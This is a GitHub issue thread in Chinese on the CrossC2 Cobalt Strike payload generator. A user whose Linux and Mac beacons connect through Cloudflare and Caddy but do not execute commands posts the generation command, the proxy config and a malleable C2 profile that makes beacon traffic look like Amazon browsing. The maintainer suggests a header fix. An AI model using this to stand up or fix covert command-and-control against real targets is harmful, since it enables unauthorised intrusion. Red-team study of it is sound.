gloxec / CrossC2

generate CobaltStrike's cross-platform payload
2.27k stars 344 forks source link

cs4.4+cloudflare+caddy能上线但是无法执行命令 #226

Open kuron3k0 opened 3 months ago

kuron3k0 commented 3 months ago

问题描述:

目前是linux和mac都可以上线,但是无法执行命令,listener换成ip上线就可以执行,用了cloudflare之后无论开不开cdn都不行,也设置了以profile的url path开头的绕过缓存了,用的profile在windows上是可以正常运行的。

环境和配置:

生成木马 genCrossC2.MacOS vpsdomain 8443 ./.cobaltstrike.beacon_keys ;;/xxx/amazon.profile Linux x86 /tmp/t_cc2.out raw

用了caddy做了反向代理(v1)

https://vpdomain:8443 {
        tls /xxx/server.pem /xxx/server.key
        proxy /s/ https://127.0.0.1:18443 {
            insecure_skip_verify
            header_upstream X-Forwarded-For {http.request.header.CF-Connecting-IP}
        }
}

profile

#
# Amazon browsing traffic profile
#
# Author: @harmj0y
#

set sleeptime "5000";
set jitter    "0";
dns-beacon {
    set maxdns    "255";
}
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36";

https-certificate {
    set keystore "cs.store";
    set password "password";
}

http-config {
    set trust_x_forwarded_for "true";
}

http-get {

    set uri "/s/ref=sx_fk_boss_1/161237-88-7583756/field-keywords=animals";

    client {

        header "Accept" "*/*";
        header "Host" "vpsdomain";
        #header "Connection" "close";

        metadata {
            base64;
            prepend "session-token=";
            prepend "skin=noskin;";
            append "csm-hit=s-7KKN11BB82RZSYGJ3BDK|1418809012996";
            header "Cookie";
        }
    }

    server {

        header "Server" "Nginx";
        header "x-amz-id-1" "AGTJNFTGDWPGY5T42PZT";
        header "x-amz-id-2" "b89yZ2xFHbtVgGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Content-Encoding" "gzip";

        output {
            print;
        }
    }
}

http-post {

    set uri "/s/ref=K4805/adj/amzn.en.sr.aps";

    client {

        header "Accept" "*/*";
        #header "Content-Type" "text/xml";
        header "X-Requested-With" "XMLHttpRequest";
        header "Host" "vpsdomain";
        #header "Connection" "close";

        parameter "sz" "160x600";
        parameter "oe" "oe=ISO-8859-1;";

        id {
            parameter "sn";
        }

        parameter "s" "3717";
        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";

        output {
            base64;
            print;
        }
    }

    server {

        header "Server" "Nginx";
        header "x-amz-id-1" "AGtYVBHT67PGY5T42OZT";
        header "x-amz-id-2" "tikJo1xrNnNtdGRsam19bGV30W85amZ8ZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "x-ua-compatible" "IE=edge";

        output {
            print;
        }
    }
}
gloxec commented 3 months ago

需要确认命令执行后,是执行了没传回结果,还是直接没执行呢? touch /tmp/aaaaa

kuron3k0 commented 3 months ago

emmm直接没有执行

gloxec commented 2 months ago

cs+nginx+cf_cdn该方式部署较为常见,是可正常通信控制功能

那应该是linux beacon端未收到teamserver下发的指令,可能原因是由于c2profile中配置的http头中的 Connection 值,因为linux beacon是严格按照c2profile内容做发送和接收的,而windows beacon在发送数据时,并不完全严格遵守c2profile设定的数据。

尝试c2profile中关于http-get/post修改内容为header "Connection" "close";,可能类似的问题见: https://github.com/gloxec/CrossC2/issues/161